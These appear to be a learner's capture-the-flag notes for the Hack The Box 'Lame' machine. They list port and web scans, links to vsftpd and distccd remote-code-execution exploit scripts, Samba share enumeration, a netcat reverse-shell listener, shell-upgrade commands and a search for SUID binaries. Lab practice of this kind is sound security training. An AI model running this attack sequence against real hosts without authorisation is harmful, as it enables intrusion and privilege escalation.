echo "10.129.186.12 lame.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA pit 10.129.186.12 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210720134238.png

nmap -sC -sV -O -p- -oA lame 10.129.186.12

nmap -sU -O -p- -oA lame-udp 10.129.186.12

nikto -h 10.129.186.12:80

gobuster dir -k -u http://10.129.186.12/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210720135253.png

https://github.com/Hellsender01/vsftpd_2.3.4_Exploit

No funciono

Pasted image 20210720142003.png

https://gist.githubusercontent.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855/raw/48ab4eb0bd69cac67bc97fbe182e39e5ded99f9f/distccd_rce_CVE-2004-2687.py

upgrade shell

script /dev/null -c bash Despues hacer un ctrl Z stty raw -echo; fg reset El terminal type es: xterm export TERM=xterm export SHELL=bash stty rows 44 columns 187

find \-name user.txt 2>/dev/null | xargs head -c 18; echo

uname -a

Pasted image 20210720142642.png

find \-perm -4000 2>/dev/null

Pasted image 20210720142745.png

which nmap | xargs ls -l

Pasted image 20210720143005.png

searchsploit samba 3 command execution

Pasted image 20210720143338.png

smbmap -H 10.129.186.12

Pasted image 20210720143708.png

smbclient //10.129.186.12/tmp --option='client min protocol=NT1' -N

Pasted image 20210720143955.png

smbclient //10.129.186.12/tmp -N

nc -lvnp 4444

Pasted image 20210720144649.png

script /dev/null -c bash Despues hacer un ctrl Z stty raw -echo; fg reset El terminal type es: xterm export TERM=xterm export SHELL=bash stty rows 44 columns 187

Pasted image 20210720145045.png

boxes

copyright©2022 Cu3rv0x all rights reserved